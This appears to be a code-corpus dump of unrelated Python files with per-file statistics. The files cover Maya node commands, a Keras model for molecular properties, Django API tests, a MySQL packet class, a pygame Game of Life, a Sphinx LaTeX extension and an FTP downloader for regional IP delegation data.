return f'createNode {self.type} -s -n "{self.absoluteName()}";'
def getSelectCmd(self):
"""
Returns a command string that can select this node.
:rtype: str
"""
return f'select -ne "{self.absoluteName()}";'
def getRenameCmd(self):
"""
Returns a command string that can rename this node's UUID.
:rtype: str
"""
return f'\trename -uid "{self.uuid}";'
def getLockNodeCmd(self):
"""
Returns a command string that can lock this node.
:rtype: str
"""
return f'\tlockNode -l {int(self.isLocked)};'
def getAddAttrCmds(self):
"""
Returns a list of commands for user-defined attributes.
:rtype: list[str]
"""
return [x.getAddAttrCmd() for x in self.listAttr(userDefined=True).values()]
def getSetAttrCmds(self):
"""
Returns a list of commands for non-default plugs.
:rtype: list[str]
"""
# Iterate through top-level plugs
#
commands = []
for plug in self.iterTopLevelPlugs():
commands.extend(plug.getSetAttrCmds())
return commands
def getConnectAttrCmds(self):
"""
Returns a list of command strings that can recreate the outgoing connections from this node.
:rtype: list[str]
"""
# Iterate through known connections
#
numCommands = len(self._connections)
commands = [None] * numCommands
for (i, ref) in enumerate(self._connections):
# Check if ref is still alive
#
otherPlug = ref()
if otherPlug is None:
continue
# Concatenate source name
#
plug = otherPlug.source()
source = plug.partialName(includeNodeName=True, useFullAttributePath=True, includeIndices=True)
# Check if destination index matters
#
if otherPlug.isElement and not otherPlug.attribute.indexMatters:
destination = otherPlug.parent.partialName(includeNodeName=True, useFullAttributePath=True, includeIndices=True)
commands[i] = f'connectAttr "{source}" "{destination}" -na;'
else:
destination = otherPlug.partialName(includeNodeName=True, useFullAttributePath=True, includeIndices=True)
commands[i] = f'connectAttr "{source}" "{destination}";'
return commands
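# --- Illustrative note (appended; not part of the original module) ---
# Given the command builders above, a hypothetical locked 'transform' node
# named 'pCube1' under parent 'group1' would serialize via __dumps__() to
# roughly the following MEL lines (UUID shortened; the tab prefixes come from
# getRenameCmd/getLockNodeCmd):
#   createNode transform -s -n "pCube1" -p "group1";
#       rename -uid "0E4C2A7B-...";
#       lockNode -l 1;
# followed by any addAttr/setAttr commands for its attributes.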
| 23.997628
| 128
| 0.571824
| 2,025
| 20,230
| 5.651852
| 0.172346
| 0.016776
| 0.016339
| 0.017475
| 0.276365
| 0.235736
| 0.171953
| 0.130712
| 0.123547
| 0.112014
| 0
| 0.000598
| 0.338952
| 20,230
| 842
| 129
| 24.026128
| 0.855231
| 0.310677
| 0
| 0.166667
| 0
| 0.003704
| 0.075687
| 0.03189
| 0
| 0
| 0
| 0.002375
| 0
| 1
| 0.177778
| false
| 0
| 0.014815
| 0
| 0.32963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34b47fa6cab25d27a526a824846c9378728893e8
| 5,195
|
py
|
Python
|
predicting_molecular_properties/nn_utils.py
|
ashesh-0/kaggle_competitions
|
58e927971b6ee67583a76a5ac821430a8d0bc31a
|
[
"MIT"
] | 1
|
2019-11-20T11:33:51.000Z
|
2019-11-20T11:33:51.000Z
|
predicting_molecular_properties/nn_utils.py
|
ashesh-0/kaggle_competitions
|
58e927971b6ee67583a76a5ac821430a8d0bc31a
|
[
"MIT"
] | null | null | null |
predicting_molecular_properties/nn_utils.py
|
ashesh-0/kaggle_competitions
|
58e927971b6ee67583a76a5ac821430a8d0bc31a
|
[
"MIT"
] | null | null | null |
"""
Utility functions for neural networks
"""
import pandas as pd
from keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint
from sklearn.preprocessing import StandardScaler
from keras.layers import Dense, BatchNormalization, Input, LeakyReLU, Dropout
from keras.models import Model, load_model
from keras.optimizers import Adam
def plot_history(history, label, loss_str='sc_outp_mean_absolute_error'):
import matplotlib.pyplot as plt
plt.plot(history.history[loss_str])
plt.plot(history.history[f'val_{loss_str}'])
plt.title(f'Loss for {label}')
plt.ylabel('Loss')
plt.xlabel('Epoch')
_ = plt.legend(['Train', 'Validation'], loc='upper left')
plt.show()
def create_nn_model(input_shape):
inp = Input(shape=(input_shape, ))
x = Dense(256)(inp)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Dropout(0.2)(x)
# x = Dense(1024)(x)
# x = BatchNormalization()(x)
# x = LeakyReLU(alpha=0.05)(x)
# x = Dropout(0.2)(x)
# x = Dense(1024)(x)
# x = BatchNormalization()(x)
# x = LeakyReLU(alpha=0.05)(x)
# x = Dropout(0.2)(x)
x = Dense(512)(x)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Dropout(0.2)(x)
# x = Dense(512)(x)
# x = BatchNormalization()(x)
# x = LeakyReLU(alpha=0.05)(x)
# x = Dropout(0.4)(x)
x = Dense(256)(x)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Dropout(0.2)(x)
out1 = Dense(20, activation="linear", name='int_outp')(x) #2 mulliken charge, tensor 6, tensor 12(others)
x = Dense(128)(x)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Dropout(0.2)(x)
# x = Dense(128)(x)
# x = BatchNormalization()(x)
# x = LeakyReLU(alpha=0.05)(x)
x = Dense(64)(x)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Dropout(0.2)(x)
out = Dense(1, activation="linear", name='sc_outp')(x) #scalar_coupling_constant
model = Model(inputs=inp, outputs=[out, out1])
# model = Model(inputs=inp, outputs=[out])
return model
def train_nn(nn_config, train_X, train_Y, val_X, val_Y, test_X):
model_name_wrt = f'molecule_model_{nn_config["type_enc"]}.hdf5'
assert isinstance(nn_config['load_model'], bool)
if nn_config['load_model'] is False:
model = create_nn_model(train_X.shape[1])
model.compile(loss='mse', metrics=['mae'], optimizer=Adam(lr=nn_config['lr']))
# tensorboard_callback = TensorBoard("logs/" + datetime.now().strftime('%H:%M:%S'), update_freq='epoch')
val_loss = 'val_sc_outp_mean_absolute_error'
es = EarlyStopping(monitor=val_loss, mode='min', patience=30, verbose=0)
rlr = ReduceLROnPlateau(monitor=val_loss, factor=0.1, patience=25, min_lr=1e-6, mode='auto', verbose=1)
sv_mod = ModelCheckpoint(
model_name_wrt, monitor='val_sc_outp_mean_absolute_error', save_best_only=True, period=1)
train_Y = train_Y.values
val_Y = val_Y.values
history = model.fit(
train_X, [train_Y[:, 0], train_Y[:, 1:]],
validation_data=(val_X, [val_Y[:, 0], val_Y[:, 1:]]),
epochs=nn_config['epochs'],
verbose=0,
batch_size=nn_config['batch_size'],
callbacks=[es, rlr, sv_mod])
plot_history(history, nn_config['type_enc'])
else:
print('Loading from file', model_name_wrt)
model = load_model(model_name_wrt)
output_dict = {
'model': model,
'train_prediction': model.predict(train_X)[0][:, 0],
'val_prediction': model.predict(val_X)[0][:, 0],
'test_prediction': model.predict(test_X)[0][:, 0],
}
return output_dict
def get_intermediate_Ydf(mulliken_df, magnetic_shielding_tensors_df, raw_train_df):
interm_Y_atomdata_df = pd.merge(
mulliken_df, magnetic_shielding_tensors_df, how='outer', on=['molecule_name', 'atom_index'])
Y_cols = interm_Y_atomdata_df.columns.tolist()
Y_cols.remove('molecule_name')
Y_cols.remove('atom_index')
interm_Y_df = raw_train_df[['molecule_name', 'atom_index_0', 'atom_index_1']].reset_index()
interm_Y_df = pd.merge(
interm_Y_df,
interm_Y_atomdata_df,
how='left',
left_on=['molecule_name', 'atom_index_0'],
right_on=['molecule_name', 'atom_index'])
interm_Y_df.rename({c: f'{c}_0' for c in Y_cols}, axis=1, inplace=True)
interm_Y_df.drop('atom_index', axis=1, inplace=True)
interm_Y_df = pd.merge(
interm_Y_df,
interm_Y_atomdata_df,
how='left',
left_on=['molecule_name', 'atom_index_1'],
right_on=['molecule_name', 'atom_index'])
interm_Y_df.rename({c: f'{c}_1' for c in Y_cols}, axis=1, inplace=True)
interm_Y_df.drop(['atom_index', 'atom_index_0', 'atom_index_1', 'molecule_name'], axis=1, inplace=True)
interm_Y_df.set_index('id', inplace=True)
# Normalization
interm_Y_df = pd.DataFrame(
StandardScaler().fit_transform(interm_Y_df), columns=interm_Y_df.columns, index=interm_Y_df.index)
return interm_Y_df
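# --- Illustrative sketch (appended; not part of the original module) ---
# A hedged example of the nn_config dict consumed by train_nn() above; the
# values are illustrative assumptions, not tuned settings.
EXAMPLE_NN_CONFIG = {
    'type_enc': '1JHC',   # hypothetical coupling-type label used in file names
    'load_model': False,  # train from scratch instead of loading the .hdf5
    'lr': 1e-3,
    'epochs': 100,
    'batch_size': 1024,
}
# output = train_nn(EXAMPLE_NN_CONFIG, train_X, train_Y, val_X, val_Y, test_X)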
| 35.101351
| 112
| 0.638499
| 751
| 5,195
| 4.165113
| 0.250333
| 0.02046
| 0.043159
| 0.060422
| 0.384591
| 0.3539
| 0.282928
| 0.269821
| 0.269821
| 0.269821
| 0
| 0.028258
| 0.209817
| 5,195
| 147
| 113
| 35.340136
| 0.733739
| 0.133013
| 0
| 0.252525
| 0
| 0
| 0.136252
| 0.029484
| 0
| 0
| 0
| 0
| 0.010101
| 1
| 0.040404
| false
| 0
| 0.070707
| 0
| 0.141414
| 0.010101
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34b6d3e8c3f61f05d6fffeaf8b3486a12424b3e5
| 2,809
|
py
|
Python
|
fn_portal/tests/api/test_fn026.py
|
AdamCottrill/FishNetPortal
|
4e58e05f52346ac1ab46698a03d4229c74828406
|
[
"MIT"
] | null | null | null |
fn_portal/tests/api/test_fn026.py
|
AdamCottrill/FishNetPortal
|
4e58e05f52346ac1ab46698a03d4229c74828406
|
[
"MIT"
] | null | null | null |
fn_portal/tests/api/test_fn026.py
|
AdamCottrill/FishNetPortal
|
4e58e05f52346ac1ab46698a03d4229c74828406
|
[
"MIT"
] | null | null | null |
"""=============================================================
~/fn_portal/fn_portal/tests/api/test_FN026.py
Created: 26 May 2021 18:01:30
DESCRIPTION:
This file contains a number of unit tests that verify that the api
endpoint for FN026 objects works as expected:
+ the fn026 list returns all of the spaces
associated with a specific project
+ the space detail endpoint will return the space code, space
description, dd_lat, dd_lon.
=============================================================
"""
import json
import pytest
from django.urls import reverse
from fn_portal.models import FN026
from fn_portal.tests.fixtures import api_client, project
from rest_framework import status
from ..factories import FN026Factory
@pytest.mark.django_db
def test_fn026_list(api_client, project):
""""""
prj_cd = project.prj_cd
url = reverse("fn_portal_api:fn026-list", kwargs={"prj_cd": prj_cd})
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
data = [
(x.get("space"), x.get("space_des"), x.get("dd_lat"), x.get("dd_lon"))
for x in response.data["results"]
]
assert len(data) == 2
expected = [("S1", "Space 1", 45.1, -81.1), ("S2", "Space 2", 45.2, -81.2)]
assert data == expected
@pytest.mark.django_db
def test_fn026_detail(api_client, project):
""""""
prj_cd = project.prj_cd
space = "S1"
expected = {
"space": "S1",
"space_des": "Space 1",
"dd_lat": 45.1,
"dd_lon": -81.1,
}
FN026Factory(project=project, **expected)
url = reverse(
"fn_portal_api:fn026-detail", kwargs={"prj_cd": prj_cd, "space": space}
)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
    for k, v in expected.items():
        assert response.data[k] == v
expected_fields = {
"project",
"label",
"space",
"space_des",
"area_lst",
"grdep_ge",
"grdep_lt",
"sidep_lt",
"sidep_ge",
"grid_ge",
"grid_lt",
"site_lst",
"sitp_lst",
"dd_lat",
"dd_lon",
}
assert set(response.data.keys()) == expected_fields
args = [
("LHA_IA19_FOO", "S1"), # bad project code, good space
("LHA_IA19_000", "99"), # good project code, bad space
]
@pytest.mark.django_db
@pytest.mark.parametrize("prj_cd,space", args)
def test_fn026_detail_404(api_client, project, prj_cd, space):
"""If we ask for space or project that does exist we should get back a
404.
"""
url = reverse(
"fn_portal_api:fn026-detail", kwargs={"prj_cd": prj_cd, "space": space}
)
response = api_client.get(url)
assert response.status_code == status.HTTP_404_NOT_FOUND
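# --- Illustrative sketch (appended; not part of the original test module) ---
# FN026Factory can seed additional spaces the same way the detail test does
# above; a hedged example (the space codes are hypothetical):
#   spaces = [FN026Factory(project=project, space=f"S{i}") for i in (3, 4, 5)]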
| 24.215517
| 79
| 0.603062
| 380
| 2,809
| 4.255263
| 0.323684
| 0.037106
| 0.037106
| 0.033395
| 0.300557
| 0.277675
| 0.261596
| 0.22449
| 0.183673
| 0.183673
| 0
| 0.045643
| 0.227839
| 2,809
| 115
| 80
| 24.426087
| 0.699862
| 0.229975
| 0
| 0.205882
| 0
| 0
| 0.159774
| 0.035714
| 0
| 0
| 0
| 0
| 0.102941
| 1
| 0.044118
| false
| 0
| 0.102941
| 0
| 0.147059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34b86bc1dbc7088b4836cb91a3edc65c0a97f48c
| 5,182
|
py
|
Python
|
mindsdb/proxies/mysql/data_types/mysql_packet.py
|
aykuttasil/mindsdb
|
2c36b6f75f13d7104fe4d3dbb7ca307fa84f45ad
|
[
"MIT"
] | 1
|
2022-03-14T00:32:53.000Z
|
2022-03-14T00:32:53.000Z
|
mindsdb/proxies/mysql/data_types/mysql_packet.py
|
aykuttasil/mindsdb
|
2c36b6f75f13d7104fe4d3dbb7ca307fa84f45ad
|
[
"MIT"
] | null | null | null |
mindsdb/proxies/mysql/data_types/mysql_packet.py
|
aykuttasil/mindsdb
|
2c36b6f75f13d7104fe4d3dbb7ca307fa84f45ad
|
[
"MIT"
] | null | null | null |
"""
*******************************************************
* Copyright (C) 2017 MindsDB Inc. <copyright@mindsdb.com>
*
* This file is part of MindsDB Server.
*
* MindsDB Server can not be copied and/or distributed without the express
* permission of MindsDB Inc
*******************************************************
"""
import struct
import pprint
# import logging
from libs.helpers.logging import logging
from libs.constants.mysql import MAX_PACKET_SIZE
class Packet:
def __init__(self, length=0, seq=0, body='', packet_string = None, socket = None, session = None, proxy = None, parent_packet=None, **kwargs):
if parent_packet is None:
self.mysql_socket = socket
self.session = session
self.proxy = proxy
else:
self.mysql_socket = parent_packet.mysql_socket
self.session = parent_packet.session
self.proxy = parent_packet.proxy
self._kwargs = kwargs
self.setup()
if packet_string is not None:
self.loadFromPacketString(packet_string)
else:
self.loadFromParams(length, seq, body)
def setup(self, length=0, seq=0, body=None):
self.loadFromParams(length=length, seq=seq, body=body)
def loadFromParams(self, length, seq, body):
self._length = length
self._seq = seq
self._body = body
def setBody(self, body_string):
self._body = body_string
self._length = len(body_string)
    def loadFromPacketString(self, packet_string):
        # Header layout: 3-byte little-endian length (padded to 4 bytes for
        # unpacking) followed by a 1-byte sequence counter, matching the
        # layout produced by getPacketString() and read by get().
        len_header = struct.unpack('<i', packet_string[:3] + b'\x00')[0]
        count_header = struct.unpack('b', packet_string[3:4])[0]
        body = packet_string[4:]
        self.loadFromParams(length=len_header, seq=count_header, body=body)
def getPacketString(self):
body = self.body
len_header = struct.pack('<i', self.length)[:3] # keep it 3 bytes
count_header = struct.pack('b', self.seq)
packet = len_header + count_header + body
return packet
def get(self):
# packet_string = self._socket.request.recv(4)
# if len(packet_string)<4:
# val = 'Expecting packet, but header len is <0'
# logging.error(val)
# raise ValueError(val)
len_header = MAX_PACKET_SIZE
body = b''
count_header = 1
while len_header == MAX_PACKET_SIZE:
packet_string = self.mysql_socket.request.recv(4)
            if len(packet_string) < 4:
                logging.warning('Packet with less than 4 bytes in length')
                return False
len_header = struct.unpack('i', packet_string[:3] + b'\x00')[0]
if len_header == 0:
break
count_header = int(packet_string[3])
body += self.mysql_socket.request.recv(len_header)
self.session.logging.debug('Got packet')
self.session.logging.debug(body)
self.session.count = int(count_header) + 1
self.setup(len(body), count_header, body)
return True
def send(self):
self._seq = self.proxy.count
string = self.getPacketString()
self.session.logging.debug('Sending packet string')
self.session.logging.debug(string)
self.mysql_socket.request.sendall(string)
self.proxy.count += 1
    def pprintPacket(self, body=None):
        if body is None:
            body = self.body
        print(str(self))
        for i, x in enumerate(body):
            # Iterating over bytes yields ints in Python 3; str yields chars.
            value = x if isinstance(x, int) else ord(x)
            print('[BODY]{i}:{h} ({inte}:{actual})'.format(i=i + 1, h=hex(value), inte=value, actual=chr(value)))
def isEOF(self):
if self.length == 0:
return True
else:
return False
@property
def length(self):
#self._length = len(self.body)
return self._length
@property
def seq(self):
return self._seq
@property
def body(self):
return self._body
@staticmethod
def bodyStringToPackets(body_string):
"""
The method takes a string and turns it into mysql_packets
:param body_string: text to turn into mysql_packets
:return: a list of mysql_packets
"""
ret = []
body_len = len(body_string)
mod = body_len % MAX_PACKET_SIZE
        num_packets = body_len // MAX_PACKET_SIZE + (1 if mod > 0 else 0)
for i in range(num_packets):
left_limit = i * MAX_PACKET_SIZE
right_limit = mod if i + 1 == num_packets else MAX_PACKET_SIZE * (i + 1)
body = body_string[left_limit:right_limit]
ret += [Packet(length=right_limit, seq=i+1, body=body)]
return ret
def __str__(self):
return str({'body': self.body, 'length': self.length, 'seq': self.seq})
def test():
import pprint
u = Packet()
#u.setBody('test')
pprint.pprint(Packet.bodyStringToPackets('abdds')[0].getPacketString())
#pprint.pprint(u.getPacketString())
# only run the test if this file is called from debugger
if __name__ == "__main__":
test()
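# --- Illustrative sketch (appended; not part of the original module) ---
# Demonstrates only the wire layout used above: a 3-byte little-endian
# length plus a 1-byte sequence number in front of the body.
def _example_header_roundtrip():
    body = b'hello'
    header = struct.pack('<i', len(body))[:3] + struct.pack('b', 1)
    packet = header + body
    length = struct.unpack('<i', packet[:3] + b'\x00')[0]
    assert length == len(body) and packet[3] == 1
    return packet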
| 28.31694
| 147
| 0.588383
| 641
| 5,182
| 4.594384
| 0.218409
| 0.057046
| 0.0309
| 0.031239
| 0.104244
| 0.037351
| 0.024448
| 0.024448
| 0.024448
| 0
| 0
| 0.010785
| 0.284253
| 5,182
| 182
| 148
| 28.472527
| 0.78323
| 0.154767
| 0
| 0.148148
| 0
| 0
| 0.033804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.148148
| false
| 0
| 0.046296
| 0.037037
| 0.296296
| 0.055556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34b987e6c437ee88219466fd33845cf6a6a27b4b
| 2,538
|
py
|
Python
|
py/example/gol.py
|
zefaxet/libant
|
1be1865404eea729f8512e9ccd73899fbd5b7cb2
|
[
"MIT"
] | 4
|
2019-10-18T06:14:36.000Z
|
2020-06-01T14:28:57.000Z
|
py/example/gol.py
|
zefaxet/libant
|
1be1865404eea729f8512e9ccd73899fbd5b7cb2
|
[
"MIT"
] | null | null | null |
py/example/gol.py
|
zefaxet/libant
|
1be1865404eea729f8512e9ccd73899fbd5b7cb2
|
[
"MIT"
] | null | null | null |
import pygame
from random import randint
from time import sleep
import data
SCREEN_SIZE = 700
STAGE_SIZE = 175 # 175 is largest size without bezels for 700 x 700 window
sizeof_rect = int(SCREEN_SIZE / STAGE_SIZE)
bezel = int((SCREEN_SIZE - (STAGE_SIZE * sizeof_rect)) / 2)
def draw_bordered_square(x, y, filled, size):
    pygame.draw.rect(screen, (0, 0, 0), (x, y, size, size))
if not filled:
pygame.draw.rect(screen, (255, 255, 255), (x + 1, y + 1, size - 2, size - 2))
def grid_to_screen(x, y):
return x * sizeof_rect + bezel, y * sizeof_rect + bezel
def screen_to_grid(x, y):
return int((x - bezel) / sizeof_rect), int((y - bezel) / sizeof_rect)
def flip_cell(x, y):
cells[x][y] = not cells[x][y]
draw_bordered_square(*grid_to_screen(x, y), cells[x][y], sizeof_rect)
def draw_cells():
for x in range(bezel, STAGE_SIZE * sizeof_rect + bezel, sizeof_rect):
for y in range(bezel, STAGE_SIZE * sizeof_rect + bezel, sizeof_rect):
coord = screen_to_grid(x, y)
draw_bordered_square(x, y, cells[coord[0]][coord[1]], sizeof_rect)
directions = []
for x in [-1, 0, 1]:
for y in [-1, 0, 1]:
directions.append((x, y))
directions.remove((0,0))
def get_neighbours(x, y):
total = 0
for d in directions:
        try:
            if cells[(x + d[0]) % STAGE_SIZE][(y + d[1]) % STAGE_SIZE]:
                total += 1
        except IndexError:
            print(x, y, d, (x + d[0]) % SCREEN_SIZE, (y + d[1]) % SCREEN_SIZE)
            raise
return total
pygame.display.set_mode((SCREEN_SIZE, SCREEN_SIZE))
pygame.display.set_caption("Game of Life Classic Demo")
pygame.init()
screen = pygame.display.get_surface()
cells = data.grid
pause = True
round = 0
while True:
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:
pause = not pause
if event.type == pygame.MOUSEBUTTONDOWN:
x, y = pygame.mouse.get_pos()
x = int(x / int(SCREEN_SIZE / STAGE_SIZE))
y = int(y / int(SCREEN_SIZE / STAGE_SIZE))
flip_cell(x, y)
print(x, y)
if event.type == pygame.QUIT:
exit(0)
if not pause and round < 50:
new_cells = []
for x in range(STAGE_SIZE):
new_row = []
for y in range(STAGE_SIZE):
neighbours = get_neighbours(x, y)
cell = cells[x][y]
if cell:
if neighbours < 2 or neighbours > 3:
cell = 0
elif neighbours == 3:
cell = 1
new_row.append(cell)
new_cells.append(new_row)
cells = new_cells
draw_cells()
round += 1
pygame.display.flip()
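# Note (appended): `data.grid` is assumed to be a STAGE_SIZE x STAGE_SIZE
# nested list of truthy/falsy cell states shipped alongside this example;
# the module itself is not part of this file.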
| 25.897959
| 80
| 0.636722
| 410
| 2,538
| 3.787805
| 0.219512
| 0.024469
| 0.033484
| 0.046362
| 0.216999
| 0.05924
| 0.05924
| 0.05924
| 0.05924
| 0.05924
| 0
| 0.029622
| 0.228526
| 2,538
| 97
| 81
| 26.164948
| 0.763534
| 0.021671
| 0
| 0
| 0
| 0
| 0.010487
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078947
| false
| 0
| 0.052632
| 0.026316
| 0.171053
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34ba56f92389624b3e0ca24dcce3ebbffc885fcd
| 3,494
|
py
|
Python
|
latexnewfloat.py
|
takaakiaoki/sphinx_latexnewfloat
|
e20c4b6825484976cf41c48a634b67524024007f
|
[
"BSD-2-Clause"
] | null | null | null |
latexnewfloat.py
|
takaakiaoki/sphinx_latexnewfloat
|
e20c4b6825484976cf41c48a634b67524024007f
|
[
"BSD-2-Clause"
] | null | null | null |
latexnewfloat.py
|
takaakiaoki/sphinx_latexnewfloat
|
e20c4b6825484976cf41c48a634b67524024007f
|
[
"BSD-2-Clause"
] | null | null | null |
r""" latexnewfloat.py extension for latex builder to replace
literal-block environment by \captionof{LiteralBlockNewFloat}{caption_title} command.
For \captionof command (in capt-of pacakge), the new environment
LiteralBlockNewFloat should be configured by newfloat pagage instead of
original float package.
needspace package is required, and \literalblockneedspace and \literalblockcaptionaboveskip
are introduced in order to control page breaks around the caption.
Usage:
add following latex preambles for latex_elements['preamble'] in conf.py
'preamble': r'''
% declare new LiteralBlockNewFloat. You may change `name` option
\DeclareFloatingEnvironment{LiteralBlockNewFloat}
% configure additional options
\SetupFloatingEnvironment{LiteralBlockNewFloat}{name=Listing,placement=h,fileext=loc}
% change the within option, similarly to literal-block in sphinx.sty
\ifx\thechapter\undefined
\SetupFloatingEnvironment{LiteralBlockNewFloat}{within=section}
\else
\SetupFloatingEnvironment{LiteralBlockNewFloat}{within=chapter}
\fi
% if the remaining page space is less than \literalblockneedspace, insert a page break
\newcommand{\literalblockneedspace}{5\baselineskip}
% margin before the caption of literal-block
\newcommand{\literalblockcaptionaboveskip}{0.5\baselineskip}
'''
Run sphinx with builder name 'latexnewfloat'
python -m sphinx.__init__ -b latexnewfloat {inputdir} {outputdir}
or
- add entry in makefile
- you may also override original latex builder entry using app.set_translator
"""
from sphinx.writers.latex import LaTeXTranslator
from sphinx.builders.latex import LaTeXBuilder
def setup(app):
app.add_builder(LaTeXNewFloatBuilder)
app.set_translator('latexnewfloat', LaTeXNewFloatTranslator)
    # uncomment if you want to override the standard latex builder
# app.set_translator('latex', LaTeXNewFloatTranslator)
app.add_latex_package('newfloat')
app.add_latex_package('capt-of')
app.add_latex_package('needspace')
return {'version': '0.3'}
# inherited from LaTeXBuilder
class LaTeXNewFloatBuilder(LaTeXBuilder):
name = 'latexnewfloat'
# inherited from LaTeXTranslator
class LaTeXNewFloatTranslator(LaTeXTranslator):
def __init__(self, document, builder):
LaTeXTranslator.__init__(self, document, builder)
# flag whether caption is under container[litelal_block=True] node
self.in_container_literal_block = 0
def visit_caption(self, node):
self.in_caption += 1
if self.in_container_literal_block:
self.body.append('\\needspace{\\literalblockneedspace}')
self.body.append('\\vspace{\\literalblockcaptionaboveskip}')
self.body.append('\\captionof{LiteralBlockNewFloat}{')
else:
self.body.append('\\caption{')
def visit_container(self, node):
if node.get('literal_block'):
self.in_container_literal_block += 1
ids = ''
for id in self.next_literal_ids:
ids += self.hypertarget(id, anchor=False)
if node['ids']:
ids += self.hypertarget(node['ids'][0])
self.next_literal_ids.clear()
self.body.append('\n')
self.context.append(ids + '\n')
def depart_container(self, node):
if node.get('literal_block'):
self.in_container_literal_block -= 1
self.body.append(self.context.pop())
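# --- Illustrative note (appended; not part of the original module) ---
# Enabling the extension in a Sphinx project's conf.py (assuming this module
# is importable as `latexnewfloat`):
#   extensions = ['latexnewfloat']
# then build with the dedicated builder:
#   python -m sphinx -b latexnewfloat <sourcedir> <outputdir>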
| 40.627907
| 92
| 0.709788
| 383
| 3,494
| 6.35248
| 0.4047
| 0.04439
| 0.034525
| 0.036169
| 0.076449
| 0.054254
| 0.054254
| 0.054254
| 0.054254
| 0.054254
| 0
| 0.003571
| 0.198626
| 3,494
| 85
| 93
| 41.105882
| 0.865357
| 0.522038
| 0
| 0.051282
| 0
| 0
| 0.130277
| 0.066345
| 0
| 0
| 0
| 0
| 0
| 1
| 0.128205
| false
| 0
| 0.051282
| 0
| 0.282051
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34baa570e639a04a3c0bb24a77d73f14fd9abb0d
| 9,347
|
py
|
Python
|
django_g11n/tools/ipranges.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
django_g11n/tools/ipranges.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
django_g11n/tools/ipranges.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Module to fetch and parse regional NIC delegation data
"""
import urllib.parse
import ftplib
import os
from functools import lru_cache
import socket
import ipaddress
from binascii import hexlify
import tempfile
TWD = tempfile.gettempdir()
DELEGATES = [
# America (non-latin)
"ftp://ftp.arin.net/pub/stats/arin/delegated-arin-extended-latest",
# Europe
"ftp://ftp.ripe.net/ripe/stats/delegated-ripencc-extended-latest",
# Africa
"ftp://ftp.afrinic.net/pub/stats/afrinic/delegated-afrinic-extended-latest",
# Asia & Pacific
"ftp://ftp.apnic.net/pub/stats/apnic/delegated-apnic-extended-latest",
# Latin-America
"ftp://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-extended-latest",]
@lru_cache(None)
def _split_url(url):
"Split delegate url into host, file_path and file_name."
url = urllib.parse.urlparse(url)
host = url.netloc
file_path, file_name = url.path.rsplit('/', 1)
return (host, file_path, file_name)
def _file_details(ftp, file_name):
"Retrieve details of the file."
details = None
print('# Retrieving file details')
try:
listing = list(ftp.mlsd())
        print('# Server supports mlsd, extracting details ...')
for entry in listing:
name, facts = entry
if name.lower() == file_name.lower():
details = facts
details['name_local'] = name
details['name_remote'] = name
break
except ftplib.error_perm:
print('# Server does not support mlsd, falling back.')
tmp = list()
ftp.retrlines('LIST %s' % file_name, callback=tmp.append)
if '->' in tmp[0]:
print('# Fall back: entry is a symbolic link, following ...')
link2name = tmp[0].split('->')[1].strip()
tmp = list()
ftp.retrlines('LIST %s' % link2name, callback=tmp.append)
details = dict()
tmp = tmp[0]
tmp = tmp.rsplit(' ', 1)[0]
details['name_local'] = file_name
details['name_remote'] = link2name
tmp, details['size'], month, day, time = tmp.rsplit(' ', 4)
details['modify'] = '_'.join([month, day, time.replace(':', '')])
return details
def download(url):
"Download the url."
host, file_path, file_name = _split_url(url)
print('# Connecting to: %s' % host)
ftp = ftplib.FTP(host)
print('# Logging in ...')
